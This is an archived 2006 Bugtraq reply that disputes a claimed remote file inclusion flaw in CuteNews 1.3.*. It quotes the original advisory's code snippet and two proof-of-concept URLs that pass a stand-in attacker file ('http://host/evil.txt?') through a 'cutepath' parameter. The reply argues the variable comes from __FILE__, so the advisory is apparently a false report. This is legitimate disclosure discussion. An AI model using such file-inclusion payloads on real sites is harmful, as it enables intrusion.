lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <44F9DF7B.7060500@gmail.com>
Date: Sat, 02 Sep 2006 21:46:03 +0200
From: satalin <satalin@...il.com>
To: bugtraq@...urityfocus.com
Subject: Re: CuteNews 1.3.* Remote File Include Vulnerability

stormhacker@...mail.com wrote:

> 
> -----------------Description---------------
> 
> 
> $cutepath =  __FILE__;
> 
> $cutepath = preg_replace( "'\\\search\.php'", "", $cutepath);
> 
> $cutepath = preg_replace( "'/search\.php'", "", $cutepath);
> 
> 
> require_once("$cutepath/inc/functions.inc.php");
> 
> 
> --------------PoC/Exploit----------------------
> 
> 
> show_news.php?cutepath=http://host/evil.txt?
> 
> search.php?cutepath=http://host/evil.txt?
> 

$cutepath =  __FILE__;

$cutepath is set to script's working directory, so you can not set it 
manually.

> --------------Solution---------------------
> 
> 
> No Patch available.
> 
> 
As no needed? ;)


Greets,
satalin

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ